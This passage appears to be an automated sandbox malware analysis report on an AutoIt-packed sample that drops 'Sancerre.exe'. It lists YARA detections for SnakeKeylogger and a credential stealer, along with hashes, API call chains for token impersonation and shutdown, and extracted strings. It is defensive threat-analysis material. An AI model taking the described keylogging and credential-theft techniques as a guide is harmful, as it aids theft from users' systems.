                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DE9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00DE9576
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00609576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00609576

                  System Summary

                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: AHSlIDftf1.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: AHSlIDftf1.exe, 00000000.00000000.1702664723.0000000000E12000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_26864ab8-f
                  Source: AHSlIDftf1.exe, 00000000.00000000.1702664723.0000000000E12000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4cec253b-9
                  Source: AHSlIDftf1.exe, 00000000.00000003.1732840356.0000000003AD1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_df722f44-8
                  Source: AHSlIDftf1.exe, 00000000.00000003.1732840356.0000000003AD1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e0272d24-5
                  Source: Sancerre.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: Sancerre.exe, 00000001.00000000.1733098011.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fbbf0979-3
                  Source: Sancerre.exe, 00000001.00000000.1733098011.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_62d283cb-d
                  Source: Sancerre.exe, 00000005.00000002.1921474420.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d0e3a150-3
                  Source: Sancerre.exe, 00000005.00000002.1921474420.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7561d223-4
                  Source: AHSlIDftf1.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_089b92cc-0
                  Source: AHSlIDftf1.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8376d2b7-4
                  Source: Sancerre.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e041734e-0
                  Source: Sancerre.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fb4489fa-3
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00DBD5EB
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DB1201
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00DBE8F6
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_005DE8F6
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D5BF400_2_00D5BF40
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC20460_2_00DC2046
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D580600_2_00D58060
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB82980_2_00DB8298
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D8E4FF0_2_00D8E4FF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D8676B0_2_00D8676B
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DE48730_2_00DE4873
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D5CAF00_2_00D5CAF0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D7CAA00_2_00D7CAA0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D6CC390_2_00D6CC39
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D86DD90_2_00D86DD9
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D591C00_2_00D591C0
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D6B1190_2_00D6B119
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe, Code function: String function: 0058F9F2 appears 31 times
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe, Code function: String function: 00590A30 appears 46 times
Source: C:\Users\user\Desktop\AHSlIDftf1.exe, Code function: String function: 00D6F9F2 appears 31 times
Source: C:\Users\user\Desktop\AHSlIDftf1.exe, Code function: String function: 00D70A30 appears 46 times
Source: AHSlIDftf1.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
